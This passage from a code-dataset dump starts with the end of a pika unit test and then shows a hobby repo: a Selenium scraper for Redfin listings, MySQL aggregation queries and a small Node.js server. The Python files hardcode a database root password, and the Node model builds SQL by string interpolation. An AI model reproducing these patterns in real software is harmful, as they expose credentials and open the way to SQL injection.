0.5)\n self.assertEqual(timer.get_remaining_interval(), 0.5)\n\n # Negative delay raises ValueError\n timer = select_connection._Timer()\n with self.assertRaises(ValueError) as cm:\n timer.call_later(-5, lambda: None)\n self.assertIn('call_later: delay must be non-negative, but got',\n cm.exception.args[0])\n\n def test_call_later_single_timer_expires(self):\n now = time.time()\n\n with mock.patch('time.time', return_value=now):\n bucket = []\n timer = select_connection._Timer()\n timer.call_later(5, lambda: bucket.append(1))\n\n # Nothing is ready to expire\n timer.process_timeouts()\n self.assertEqual(bucket, [])\n self.assertEqual(timer.get_remaining_interval(), 5)\n\n # Advance time by 5 seconds and expect the timer to expire\n with mock.patch('time.time', return_value=now + 5):\n self.assertEqual(timer.get_remaining_interval(), 0)\n timer.process_timeouts()\n self.assertEqual(bucket, [1])\n self.assertEqual(len(timer._timeout_heap), 0)\n self.assertIsNone(timer.get_remaining_interval())\n\n def test_call_later_multiple_timers(self):\n now = time.time()\n\n bucket = []\n timer = select_connection._Timer()\n\n with mock.patch('time.time', return_value=now):\n timer.call_later(5, lambda: bucket.append(1))\n timer.call_later(5, lambda: bucket.append(2))\n timer.call_later(10, lambda: bucket.append(3))\n\n # Nothing is ready to fire yet\n self.assertEqual(timer.get_remaining_interval(), 5)\n timer.process_timeouts()\n self.assertEqual(bucket, [])\n self.assertEqual(timer.get_remaining_interval(), 5)\n\n # Advance time by 6 seconds and expect first two timers to expire\n with mock.patch('time.time', return_value=now + 6):\n self.assertEqual(timer.get_remaining_interval(), 0)\n timer.process_timeouts()\n self.assertEqual(bucket, [1, 2])\n self.assertEqual(len(timer._timeout_heap), 1)\n self.assertEqual(timer.get_remaining_interval(), 4)\n\n # Advance time by 10 seconds and expect the 
3rd timeout to expire\n with mock.patch('time.time', return_value=now + 10):\n self.assertEqual(timer.get_remaining_interval(), 0)\n timer.process_timeouts()\n self.assertEqual(bucket, [1, 2, 3])\n self.assertEqual(len(timer._timeout_heap), 0)\n self.assertIsNone(timer.get_remaining_interval())\n\n def test_add_and_remove_timeout(self):\n now = time.time()\n\n bucket = []\n timer = select_connection._Timer()\n\n with mock.patch('time.time', return_value=now):\n timer.call_later(10, lambda: bucket.append(3)) # t3\n t2 = timer.call_later(6, lambda: bucket.append(2))\n t1 = timer.call_later(5, lambda: bucket.append(1))\n\n # Nothing is ready to fire yet\n self.assertEqual(timer.get_remaining_interval(), 5)\n timer.process_timeouts()\n self.assertEqual(bucket, [])\n self.assertEqual(timer.get_remaining_interval(), 5)\n\n # Cancel t1 and t2 that haven't expired yet\n timer.remove_timeout(t1)\n self.assertIsNone(t1.callback)\n self.assertEqual(timer._num_cancellations, 1)\n timer.remove_timeout(t2)\n self.assertIsNone(t2.callback)\n self.assertEqual(timer._num_cancellations, 2)\n self.assertEqual(timer.get_remaining_interval(), 5)\n timer.process_timeouts()\n self.assertEqual(bucket, [])\n self.assertEqual(timer._num_cancellations, 2)\n self.assertEqual(timer.get_remaining_interval(), 5)\n self.assertEqual(len(timer._timeout_heap), 3)\n\n # Advance time by 6 seconds to expire t1 and t2 and verify they don't\n # fire\n with mock.patch('time.time', return_value=now + 6):\n self.assertEqual(timer.get_remaining_interval(), 0)\n timer.process_timeouts()\n self.assertEqual(bucket, [])\n self.assertEqual(timer._num_cancellations, 0)\n self.assertEqual(len(timer._timeout_heap), 1)\n self.assertEqual(timer.get_remaining_interval(), 4)\n\n # Advance time by 10 seconds to expire t3 and verify it fires\n with mock.patch('time.time', return_value=now + 10):\n self.assertEqual(timer.get_remaining_interval(), 0)\n timer.process_timeouts()\n self.assertEqual(bucket, [3])\n self.assertEqual(len(timer._timeout_heap), 0)\n self.assertIsNone(timer.get_remaining_interval())\n\n def test_gc_of_unexpired_timeouts(self):\n now = time.time()\n bucket = []\n timer = select_connection._Timer()\n\n with mock.patch.multiple(select_connection._Timer,\n _GC_CANCELLATION_THRESHOLD=1):\n with mock.patch('time.time', return_value=now):\n t3 = timer.call_later(10, lambda: bucket.append(3))\n t2 = timer.call_later(6, lambda: bucket.append(2))\n t1 = timer.call_later(5, lambda: bucket.append(1))\n\n # Cancel t1 and check that it doesn't trigger GC because it's\n # not greater than half the timeouts\n timer.remove_timeout(t1)\n self.assertEqual(timer._num_cancellations, 1)\n timer.process_timeouts()\n self.assertEqual(timer._num_cancellations, 1)\n self.assertEqual(bucket, [])\n self.assertEqual(len(timer._timeout_heap), 3)\n self.assertEqual(timer.get_remaining_interval(), 5)\n\n # Cancel t3 and verify GC since it's now greater than half of\n # total timeouts\n timer.remove_timeout(t3)\n self.assertEqual(timer._num_cancellations, 2)\n timer.process_timeouts()\n self.assertEqual(bucket, [])\n self.assertEqual(len(timer._timeout_heap), 1)\n self.assertIs(t2, timer._timeout_heap[0])\n self.assertEqual(timer.get_remaining_interval(), 6)\n self.assertEqual(timer._num_cancellations, 0)\n\n def test_add_timeout_from_another_timeout(self):\n now = time.time()\n bucket = []\n timer = select_connection._Timer()\n\n with mock.patch('time.time', return_value=now):\n t1 = timer.call_later(\n 5,\n lambda: bucket.append(\n timer.call_later(0, 
lambda: bucket.append(2))))\n\n # Advance time by 10 seconds and verify that t1 fires and creates t2,\n # but timer manager defers firing of t2 to next `process_timeouts` in\n # order to avoid IO starvation\n with mock.patch('time.time', return_value=now + 10):\n timer.process_timeouts()\n t2 = bucket.pop()\n self.assertIsInstance(t2, select_connection._Timeout)\n self.assertIsNot(t2, t1)\n self.assertEqual(bucket, [])\n self.assertEqual(len(timer._timeout_heap), 1)\n self.assertIs(t2, timer._timeout_heap[0])\n self.assertEqual(timer.get_remaining_interval(), 0)\n\n # t2 should now fire\n timer.process_timeouts()\n self.assertEqual(bucket, [2])\n self.assertEqual(timer.get_remaining_interval(), None)\n\n def test_cancel_unexpired_timeout_from_another_timeout(self):\n now = time.time()\n bucket = []\n timer = select_connection._Timer()\n\n with mock.patch('time.time', return_value=now):\n t2 = timer.call_later(10, lambda: bucket.append(2))\n t1 = timer.call_later(5, lambda: timer.remove_timeout(t2))\n\n self.assertIs(t1, timer._timeout_heap[0])\n\n # Advance time by 6 seconds and check that t2 is cancelled, but not\n # removed from timeout heap\n with mock.patch('time.time', return_value=now + 6):\n timer.process_timeouts()\n self.assertIsNone(t2.callback)\n self.assertEqual(timer.get_remaining_interval(), 4)\n self.assertIs(t2, timer._timeout_heap[0])\n self.assertEqual(timer._num_cancellations, 1)\n\n # Advance time by 10 seconds and verify that t2 is removed without\n # firing\n with mock.patch('time.time', return_value=now + 10):\n timer.process_timeouts()\n self.assertEqual(bucket, [])\n self.assertIsNone(timer.get_remaining_interval())\n self.assertEqual(len(timer._timeout_heap), 0)\n self.assertEqual(timer._num_cancellations, 0)\n\n\n def test_cancel_expired_timeout_from_another_timeout(self):\n now = time.time()\n bucket = []\n timer = select_connection._Timer()\n\n with mock.patch('time.time', return_value=now):\n t2 = timer.call_later(10, lambda: bucket.append(2))\n t1 = timer.call_later(\n 5,\n lambda: (self.assertEqual(timer._num_cancellations, 0),\n timer.remove_timeout(t2)))\n\n self.assertIs(t1, timer._timeout_heap[0])\n\n # Advance time by 10 seconds and check that t2 is cancelled and\n # removed from timeout heap\n with mock.patch('time.time', return_value=now + 10):\n timer.process_timeouts()\n self.assertEqual(bucket, [])\n self.assertIsNone(t2.callback)\n self.assertIsNone(timer.get_remaining_interval())\n self.assertEqual(len(timer._timeout_heap), 0)\n self.assertEqual(timer._num_cancellations, 0)\n" }, { "alpha_fraction": 0.7038167715072632, "alphanum_fraction": 0.7160305380821228, "avg_line_length": 21.586206436157227, "blob_id": "55333dbc2e33089b8c22c8bc705f6803e4db4c0c", "content_id": "712651264b51caf70a98e0cc852ef05d7e883bee", "detected_licenses": [ "BSD-3-Clause" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 655, "license_type": "permissive", "max_line_length": 69, "num_lines": 29, "path": "/tests/unit/twisted_tests.py", "repo_name": "hugovk/pika", "src_encoding": "UTF-8", "text": "\"\"\"\nTests for pika.adapters.twisted_connection\n\"\"\"\nimport unittest\n\nimport mock\n\nfrom pika.adapters import twisted_connection\n\n\n# missing-docstring\n# pylint: disable=C0111\n\n# invalid-name\n# pylint: disable=C0103\n\n\nclass TwistedProtocolConnectionTests(unittest.TestCase):\n\n @mock.patch('pika.connection.Connection.add_on_close_callback')\n def test_twisted_protocol_connection_call_parent(self, mock_add):\n 
twisted_connection.TwistedProtocolConnection(\n None,\n on_close_callback=self._on_close)\n mock_add.assert_called_once_with(self._on_close)\n\n @staticmethod\n def _on_close(connection, error):\n pass\n" } ]
3
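The Deferred-based API that the twisted_connection docstrings above describe composes naturally with inlineCallbacks. A minimal consumer sketch, assuming an already-established connection whose channel() fires with a TwistedChannel; the queue name is a placeholder:

    from twisted.internet import defer

    @defer.inlineCallbacks
    def consume(connection):
        channel = yield connection.channel()        # fires with a TwistedChannel
        yield channel.queue_declare(queue='test')   # wrapped method: a Deferred
        queue, consumer_tag = yield channel.basic_consume(queue='test')
        # queue.get() fires with the tuple the pika callback would have received.
        ch, method, properties, body = yield queue.get()
        print(body)
        ch.basic_ack(delivery_tag=method.delivery_tag)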
AlanK27/zill
https://github.com/AlanK27/zill
29dc0b981a9d7b6d858bd8cf347dcf74882f8f41
d61096b48f727cba21d867f2ddfa57bb1c238743
331e6674af66137209f5a0b9d8d80f1b442e9c0a
refs/heads/main
2023-03-08T11:13:16.228013
2021-02-24T00:39:12
2021-02-24T00:39:12
291,178,802
0
0
null
null
null
null
null
[ { "alpha_fraction": 0.4891461730003357, "alphanum_fraction": 0.7018813490867615, "avg_line_length": 15.853658676147461, "blob_id": "852bbf57cc03cfcfd9d4a8a2b3e8efc82315c1d3", "content_id": "b5d4a1162ada2720c74c34346987ebbbfc7ec4bc", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Text", "length_bytes": 691, "license_type": "permissive", "max_line_length": 24, "num_lines": 41, "path": "/requirements.txt", "repo_name": "AlanK27/zill", "src_encoding": "UTF-8", "text": "attrs==20.1.0\nAutomat==20.2.0\nbeautifulsoup4==4.9.1\nbs4==0.0.1\ncffi==1.14.2\nconstantly==15.1.0\ncryptography==3.1\ncssselect==1.1.0\nhyperlink==20.0.1\nidna==2.10\nincremental==17.5.0\nitemadapter==0.1.0\nitemloaders==1.0.2\njmespath==0.10.0\nlxml==4.5.2\nmysql==0.0.2\nmysql-connector==2.2.9\nmysqlclient==2.0.1\nparsel==1.6.0\npgdb==0.0.8\nProtego==0.1.16\npsycopg2==2.8.5\npsycopg2-binary==2.8.5\npyasn1==0.4.8\npyasn1-modules==0.2.8\npycparser==2.20\nPyDispatcher==2.0.5\nPyGreSQL==5.2\nPyHamcrest==2.0.2\nPyMySQL==0.10.0\npyOpenSSL==19.1.0\nqueuelib==1.5.0\nScrapy==2.3.0\nselenium==3.141.0\nservice-identity==18.1.0\nsix==1.15.0\nsoupsieve==2.0.1\nTwisted==20.3.0\nurllib3==1.25.10\nw3lib==1.22.0\nzope.interface==5.1.0\n" }, { "alpha_fraction": 0.5792300701141357, "alphanum_fraction": 0.6168308258056641, "avg_line_length": 18.61403465270996, "blob_id": "5657b84b0a1dbb4d9eeaaa67e6ed13d32768c641", "content_id": "295d9a154e2c6ecbfff35ca31810beeae83009f8", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 1117, "license_type": "permissive", "max_line_length": 38, "num_lines": 57, "path": "/data_scrapping/zillow_mine/spiders/sql_queries/initiate_table.sql", "repo_name": "AlanK27/zill", "src_encoding": "UTF-8", "text": "CREATE TABLE IF NOT EXISTS main (\n dates date,\n addrs varchar(150),\n bedroom int,\n sqft int,\n bathroom int,\n parking int,\n price float(2),\n rental_in float(2),\n year int,\n price_sq float(2),\n neighbor varchar(5)\n);\nCREATE TABLE IF NOT EXISTS month1 (\n date date,\n address varchar(255) ,\n location varchar(255) ,\n price int\n);\nCREATE TABLE IF NOT EXISTS month6 (\n date date,\n address varchar(255) ,\n location varchar(255) ,\n price int\n);\nCREATE TABLE IF NOT EXISTS today (\n dates date,\n addrs varchar(150),\n bedroom int,\n sqft int,\n bathroom int,\n parking int,\n price float(2),\n rental_in float(2),\n year int,\n price_sq float(2),\n neighbor varchar(5)\n);\nCREATE TABLE IF NOT EXISTS week1 (\n date date,\n address varchar(255) ,\n location varchar(255) ,\n price int\n);\nCREATE TABLE IF NOT EXISTS yesterday (\n dates date,\n addrs varchar(150),\n bedroom int,\n sqft int,\n bathroom int,\n parking int,\n price float(2),\n rental_in float(2),\n year int,\n price_sq float(2),\n neighbor varchar(5)\n);" }, { "alpha_fraction": 0.6017699241638184, "alphanum_fraction": 0.6017699241638184, "avg_line_length": 16.384614944458008, "blob_id": "f935072ca35cae0f41ea0e479eb83db1c55b21e3", "content_id": "2afc819e83ab072fc74d8033111ef07f4c6f69f5", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 226, "license_type": "permissive", "max_line_length": 50, "num_lines": 13, "path": "/data_scrapping/start.py", "repo_name": "AlanK27/zill", "src_encoding": "UTF-8", "text": "\nfrom zillow_mine.spiders.spider_selen import crawl\nfrom db_calc.execute import calc_execute\n\n\ndef run():\n print('starting')\n x = crawl()\n x.initiate()\n y = calc_execute()\n 
\n\nif __name__ == '__main__':\n run()" }, { "alpha_fraction": 0.6463022232055664, "alphanum_fraction": 0.6945337653160095, "avg_line_length": 19.799999237060547, "blob_id": "003e428558fb2658682ebe95066875ed410d5828", "content_id": "a2e54d3c5270d110ef50ec0fe3c11a6c9058993d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 311, "license_type": "permissive", "max_line_length": 54, "num_lines": 15, "path": "/data_scrapping/db_calc/queries/sql_queries/del_dups_main.sql", "repo_name": "AlanK27/zill", "src_encoding": "UTF-8", "text": "drop table if exists del_dup;\ncreate table del_dup(\n\twith main2 as (\n\tselect * from main\n\twhere main.date > subdate(curdate(), interval 2 day))\n\tselect m1.*\n\tfrom \n\t\tmain2 m1, main2 m2\n\twhere\n\t\tm1.address = m2.address and\n\t\tm1.location = m2.location and\n\t\tm1.price = m2.price\n\tgroup by\n\t\tm1.address, m1.price\n);" }, { "alpha_fraction": 0.6117545962333679, "alphanum_fraction": 0.6177605986595154, "avg_line_length": 31.375, "blob_id": "a9f17e49b7cadb408d691b94623e69d1934782c2", "content_id": "23240620f6a89ee42f7038057408307376ec39d1", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2331, "license_type": "permissive", "max_line_length": 155, "num_lines": 72, "path": "/data_scrapping/zillow_mine/spiders/spider_selen.py", "repo_name": "AlanK27/zill", "src_encoding": "UTF-8", "text": "\nfrom bs4 import BeautifulSoup\nfrom selenium import webdriver\nfrom selenium.webdriver.common.keys import Keys\nfrom selenium.webdriver.common.by import By\nfrom selenium.webdriver.support.ui import WebDriverWait\nfrom selenium.webdriver.support import expected_conditions as EC\nfrom zillow_mine.spiders.bs4_json import bsj\nfrom zillow_mine.spiders.to_db import db_parse\nimport time\n\n\nclass crawl:\n\n\n def __init__(self, site = 'https://www.redfin.com/city/10201/NV/Las-Vegas/filter/max-days-on-market=1d'):\n self.path = 'C:/chromedriver/chromedriver.exe'\n self.site = site\n self.driver = []\n\n\n def crawler(self):\n wait = WebDriverWait(self.driver, 10)\n element = wait.until(EC.element_to_be_clickable((By.CLASS_NAME, \"PagingControls\")))\n q = self.driver.find_element_by_css_selector(\"button[class='ModeOption button-text']\")\n q.click()\n self.driver.switch_to_window(self.driver.window_handles[0])\n element_addr = wait.until(EC.presence_of_element_located((By.CLASS_NAME, \"location\")))\n fg = True\n while fg:\n spyder = bsj(page_source = self.driver.page_source)\n spyder.initate()\n fg = self.next_pg()\n self.driver.quit()\n\n\n def next_pg(self):\n wait = WebDriverWait(self.driver,10)\n wait.until(EC.element_to_be_clickable((By.ID, 'content')))\n try:\n q = self.driver.find_element_by_css_selector(\"button[class='clickable buttonControl button-text'][data-rf-test-id='react-data-paginate-next']\")\n q.click()\n wait.until(EC.visibility_of_element_located((By.CLASS_NAME, \"address\")))\n self.driver.switch_to_window(self.driver.window_handles[0])\n return True\n except:\n return False\n\n\n def db_check(self):\n conn = db_parse()\n conn.connect()\n fg = conn.check_db()\n conn.disconnect()\n return fg\n\n\n def initiate(self):\n if self.db_check():\n print('db check pass')\n self.driver = webdriver.Chrome(self.path)\n self.driver.get(self.site)\n print(self.driver.title)\n self.crawler()\n \n else:\n print('scrap was done already')\n\n\nif __name__ == '__main__':\n x = crawl()\n x.db_check()\n x.initiate()" }, { 
"alpha_fraction": 0.5097143054008484, "alphanum_fraction": 0.527999997138977, "avg_line_length": 19.761905670166016, "blob_id": "980a990e6627628b19ded74a3db294778d6f2ca1", "content_id": "92c79c290dd799cd69cbf44d4b327710a1f3deb4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 875, "license_type": "permissive", "max_line_length": 83, "num_lines": 42, "path": "/data_scrapping/db_calc/mysql_db/conn_db.py", "repo_name": "AlanK27/zill", "src_encoding": "UTF-8", "text": "import datetime\nfrom datetime import date, timedelta\nimport os\nimport mysql.connector\n\n\nclass db_conn:\n\n\n def __init__(self, db = 'rfin_db', user = 'root', port = '3306', ssl='prefer'):\n self.db = db\n self.host = '127.0.0.1'\n self.user = user\n self.password = 'whore11'\n self.conn = []\n self.cur = []\n\n\n def connect(self):\n self.conn = mysql.connector.connect(\n user = 'root',\n host = '127.0.0.1',\n password = self.password,\n database = self.db\n )\n self.cur = self.conn.cursor(buffered=True)\n print('conn connected')\n\n\n def disconnect(self):\n self.conn.commit()\n self.conn.close()\n\n\n def test_connection(self):\n self.connect()\n self.disconnect()\n\n\nif __name__ == '__main__':\n x = db_parse()\n x.test_connection()\n\n\n\n" }, { "alpha_fraction": 0.6283186078071594, "alphanum_fraction": 0.6283186078071594, "avg_line_length": 56, "blob_id": "de3001ed666bb1ddcd8b22533eb93cd0ad6f1598", "content_id": "a8f4e9d44442b19630efdc8139b03c3b84fb6ee4", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 113, "license_type": "permissive", "max_line_length": 79, "num_lines": 2, "path": "/data_scrapping/zillow_mine/spiders/sql_queries/insert.sql", "repo_name": "AlanK27/zill", "src_encoding": "UTF-8", "text": "INSERT INTO {tab} (date, address, location, price, beds, baths, sqft, per_sqft)\nVALUES (%s,%s,%s,%s,%s,%s,%s,%s);" }, { "alpha_fraction": 0.5186722278594971, "alphanum_fraction": 0.5207468867301941, "avg_line_length": 22.536584854125977, "blob_id": "a0b98f3b4567a9e7d07e3e49b0483e838dd16da8", "content_id": "c38e431d2a72e03817741240894c3f83fc0b4adf", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 964, "license_type": "permissive", "max_line_length": 65, "num_lines": 41, "path": "/data_scrapping/db_calc/queries/queries.py", "repo_name": "AlanK27/zill", "src_encoding": "UTF-8", "text": "import os\nfrom db_calc.mysql_db.conn_db import db_conn\n\n\nclass query(db_conn):\n\n\n def __init__(self):\n super().__init__()\n self.path = os.getcwd() + \"\\db_calc\\queries\\sql_queries\"\n\n def del_dups(self):\n\n with open(self.path + '\\\\del_dups_main.sql', 'r') as rf:\n query = rf.read().split(';')\n for comm in query:\n self.cur.execute(comm)\n\n def weekly(self):\n\n with open(self.path + '\\\\weekly.sql', 'r') as rf:\n query = rf.read().split(';')\n for comm in query:\n self.cur.execute(comm)\n\n\n def monthly(self, months):\n \n with open(self.path + '\\\\monthly.sql', 'r') as rf:\n query = rf.read().split(';')\n for comm in query:\n self.cur.execute(comm.format(months))\n\n\n def initiate(self):\n self.connect()\n self.del_dups()\n self.weekly()\n self.monthly(1)\n self.monthly(6)\n self.disconnect()" }, { "alpha_fraction": 0.5388967394828796, "alphanum_fraction": 0.5388967394828796, "avg_line_length": 15.809523582458496, "blob_id": "8261236ce971b527afbb40ec2a15ff78caba09f5", "content_id": 
"6506014747e43484f8dabbe4100789d99631f38d", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 707, "license_type": "permissive", "max_line_length": 41, "num_lines": 42, "path": "/node_server/model/DB.js", "repo_name": "AlanK27/zill", "src_encoding": "UTF-8", "text": "\nconst db = require('../util/db/mysql_db')\n\nmodule.exports = class Db {\n constructor(data) {\n this.data = data;\n }\n\n static fetchA(df, ofset, amnt) {\n return db.execute(`\n select * \n from ${df}\n order by address \n limit ${ofset},${amnt};`);\n }\n\n static db_size(df) {\n return db.execute(`\n select count(*) \n from ${df};`)\n }\n\n static db_search_size(df, addr) {\n return db.execute(`\n select count(*) \n from (${df})\n where address rlike ?\n ;`, [addr]\n )\n }\n\n static search(df, addr, ofset, amnt) {\n return db.execute(`\n select * \n from main \n where address rlike ?\n order by date desc\n limit ${ofset}, ${amnt}\n ;`, [addr]\n )\n }\n\n}\n" }, { "alpha_fraction": 0.5862069129943848, "alphanum_fraction": 0.5862069129943848, "avg_line_length": 15, "blob_id": "003e7dfe25973fdc1f448957f9dace592b61d70a", "content_id": "e1e84bf04371e111bc8118d75a2d903114dd3394", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 145, "license_type": "permissive", "max_line_length": 41, "num_lines": 9, "path": "/data_scrapping/db_calc/execute.py", "repo_name": "AlanK27/zill", "src_encoding": "UTF-8", "text": "\nfrom db_calc.queries.queries import query\n\n\ndef calc_execute():\n x = query()\n x.initiate()\n\nif __name__ == '__main__':\n calc_execute()\n" }, { "alpha_fraction": 0.4865076243877411, "alphanum_fraction": 0.4958936274051666, "avg_line_length": 24.787878036499023, "blob_id": "96dd998b374cc9af5b1013ad5679ebacc6cdd911", "content_id": "67134c502e355739de6f74e901e50c55fd2f8e83", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "Python", "length_bytes": 2557, "license_type": "permissive", "max_line_length": 107, "num_lines": 99, "path": "/data_scrapping/zillow_mine/spiders/to_db.py", "repo_name": "AlanK27/zill", "src_encoding": "UTF-8", "text": "import datetime\nfrom datetime import date, timedelta\nimport os\nfrom os import listdir\nimport mysql.connector\n\n\nclass db_parse:\n\n\n def __init__(self, data = [], table = [], db = 'rfin_db', user = 'root', port = '3306', ssl='prefer'):\n \n self.data = data\n self.table = table\n self.db = db\n self.host = '127.0.0.1'\n self.user = user\n self.password = 'whore11'\n self.path = os.getcwd() + '\\zillow_mine\\spiders\\sql_queries'\n self.conn = []\n self.cur = []\n\n\n def connect(self):\n self.conn = mysql.connector.connect(\n user = 'root',\n host = '127.0.0.1',\n password = self.password,\n database = self.db\n )\n self.cur = self.conn.cursor(buffered=True)\n print('conn connected')\n\n\n def disconnect(self):\n self.conn.commit()\n self.conn.close()\n\n\n def query(self):\n self.insert_to_table(table='today', data=self.data)\n self.insert_to_table(table='main', data=self.data)\n\n\n def insert_to_table(self, table, data):\n with open(self.path + '\\\\insert.sql', 'r') as rf:\n query = rf.read().format(tab = table)\n for d in data: \n self.cur.execute(query, d)\n\n def check_db(self):\n self.conn = mysql.connector.connect(\n user = 'root',\n host = '127.0.0.1',\n password = self.password,\n database = self.db\n )\n cur = self.conn.cursor(buffered=True)\n\n\n\n with open(self.path + '\\\\initiate_table.sql', 
'r') as rf:\n query = rf.read().split(';') \n for squ in query:\n cur.execute(squ, multi=True)\n\n try:\n cur.execute('select max(date) from today')\n datee = cur.fetchone()\n print(date.today())\n print(datee[0])\n if (date.today() > datee[0]):\n print('refreshing T_Y')\n with open(self.path + '\\\\operation.sql', 'r') as rf:\n query = rf.read().split(';') \n for squ in query:\n cur.execute(squ, multi=True)\n return True\n else:\n print('already scrapped today')\n return False\n \n except:\n print('fresh insert')\n return True\n\n\n def initiate(self):\n self.connect()\n self.query()\n self.disconnect()\n\n\nif __name__ == '__main__':\n x = db_parse()\n x.connect()\n if x.check_db():\n pass\n x.disconnect()\n\n\n\n\n" }, { "alpha_fraction": 0.7067307829856873, "alphanum_fraction": 0.7067307829856873, "avg_line_length": 21.88888931274414, "blob_id": "ff388dda6381ec517ec46573ff5191c37beaf63d", "content_id": "7b3ec65b0e67bf7e6c485e65d23c64191ce85c1a", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 208, "license_type": "permissive", "max_line_length": 63, "num_lines": 9, "path": "/node_server/routes/half_y.js", "repo_name": "AlanK27/zill", "src_encoding": "UTF-8", "text": "\nconst express = require('express');\n\nconst half_y_change = require('../controller/half_y_change.js')\n\nconst router = express.Router()\n\nrouter.get('/half_year', half_y_change.half)\n\nmodule.exports = router;\n\n" }, { "alpha_fraction": 0.5927505493164062, "alphanum_fraction": 0.6439232230186462, "avg_line_length": 21.90243911743164, "blob_id": "19193aab3c398354166e0bb95b08508040023cf1", "content_id": "ac26080c42f079bf94db290ae76f6035d2751e6f", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 938, "license_type": "permissive", "max_line_length": 65, "num_lines": 41, "path": "/data_scrapping/db_calc/queries/sql_queries/weekly.sql", "repo_name": "AlanK27/zill", "src_encoding": "UTF-8", "text": "drop table if exists week1;\ncreate table week1 (\n\twith weekly as (\n\t\tselect * from main\n\t\twhere \n\t\t\tdate > subdate(curdate(), interval 1 week)\n\t),\n amax as ( \n\t\tselect m1.date, m1.address, m1.location, max(m1.price) as price\n\t\tfrom weekly m1, weekly m2\n\t\twhere\n\t\t\tm1.address = m2.address\n\t\tgroup by \n\t\t\tm2.address, m1.price, m1.location\n\t\thaving\n\t\t\tcount(m2.address) > 1 and\n\t\t\tm1.price = max(m2.price)\n\t),\n amin as (\n\t\tselect m1.date, m1.address, m1.location, min(m1.price) as price\n\t\tfrom weekly m1, weekly m2\n\t\twhere\n\t\t\tm1.address = m2.address\n\t\tgroup by \n\t\t\tm2.address, m1.price, m1.location\n\t\thaving\n\t\t\tcount(m2.address) > 1 and\n\t\t\tm1.price = min(m2.price)\n\t),\n week1 as ( \n select * from amax \n union all\n select * from amin\n )\n select m1.date, m1.address, m1.location, m1.price\n\tfrom week1 m1, week1 m2\n\twhere\n m1.address = m2.address and\n\tm1.location = m2.location and\n m1.price != m2.price\n );" }, { "alpha_fraction": 0.5959232449531555, "alphanum_fraction": 0.6354916095733643, "avg_line_length": 23.544116973876953, "blob_id": "470c68edeea9923010ed57feeb5977dff270a11a", "content_id": "88169f43143dee02ee45b5ee52452163674e9334", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "SQL", "length_bytes": 1668, "license_type": "permissive", "max_line_length": 74, "num_lines": 68, "path": "/data_scrapping/db_calc/queries/sql_queries/monthly.sql", "repo_name": "AlanK27/zill", 
"src_encoding": "UTF-8", "text": "-- Table is created displaying the max and min based on the previous month\n-- duplicates needs to be cleared\ndrop table if exists month{};\ncreate table month{0} (\n\twith monthly as (\n\t\tselect * from main\n\t\twhere \n\t\t\tdate > subdate(curdate(), interval {0} month)\n\t),\n amax as ( \n\t\tselect m1.date, m1.address, m1.location, max(m1.price) as price\n\t\tfrom monthly m1, monthly m2\n\t\twhere\n\t\t\tm1.address = m2.address\n\t\tgroup by \n\t\t\tm2.address, m1.price, m1.location\n\t\thaving\n\t\t\tcount(m2.address) > 1 and\n\t\t\tm1.price = max(m2.price)\n\t),\n amin as (\n\t\tselect m1.date, m1.address, m1.location, min(m1.price) as price\n\t\tfrom monthly m1, monthly m2\n\t\twhere\n\t\t\tm1.address = m2.address\n\t\tgroup by \n\t\t\tm2.address, m1.price, m1.location\n\t\thaving\n\t\t\tcount(m2.address) > 1 and\n\t\t\tm1.price = min(m2.price)\n\t),\n month1 as ( \n select * from amax \n union all\n select * from amin\n )\n-- remove duplicates\n select m1.date, m1.address, m1.location, m1.price\n\tfrom month1 m1, month1 m2\n\twhere\n m1.address = m2.address and\n\tm1.location = m2.location and\n m1.price != m2.price\n);\n-- insert most recent price of addresses listed above\n-- insert into month1 (\n-- \twith monthlly as (\n-- \t\t\tselect date, address, price\n-- \t\t\tfrom main\n-- \t\t\twhere date > subdate(curdate(), interval 1 month)\n-- \t\t)\n\n-- \t\tselect m1.date, m1.address, m1.price\n-- \t\tfrom monthlly m1, monthlly m2\n-- \t\twhere \n-- \t\t\tm1.address = m2.address and\n-- \t\t\tm1.date = m2.date and\n-- \t\t\tm1.price = m2.price\n-- \t\tgroup by \n-- \t\t\tm1.address\n-- \t\thaving \n-- \t\t\tm1.date = max(m2.date) and\n-- \t\t\t(m1.date, m1.address) in (\n-- \t\t\t\tselect date, address \n-- \t\t\t\tfrom month1\n-- \t\t\t\tgroup by address\n-- \t\t\t)\n-- )" }, { "alpha_fraction": 0.42424243688583374, "alphanum_fraction": 0.5151515007019043, "avg_line_length": 20.33333396911621, "blob_id": "e623ce09d895baa187d3f351d6194dd9cc2a6f03", "content_id": "43d0cb2671f93236e828f429dbd49923b860d2e0", "detected_licenses": [ "MIT" ], "is_generated": false, "is_vendor": false, "language": "JavaScript", "length_bytes": 132, "license_type": "permissive", "max_line_length": 36, "num_lines": 6, "path": "/node_server/controller/404.js", "repo_name": "AlanK27/zill", "src_encoding": "UTF-8", "text": "\n\nexports.error = (req, res, next)=> {\n res.status(404).render('404',\n {pageTitle: '404'},\n console.log('404')\n );\n};\n\n\n" }, { "alpha_fraction": 0.4981149733066559, "alphanum_fraction": 0.5009425282478333, "avg_line_length": 28.47222137451172, "blob_id": "830e8410c5eb60e18de84a36c5fe75e86f14f3c6", "content_id": "bdd5259c49ed7d515a5bc34ccbea33c7c612111f", "detected_licenses": [ "MIT" ], 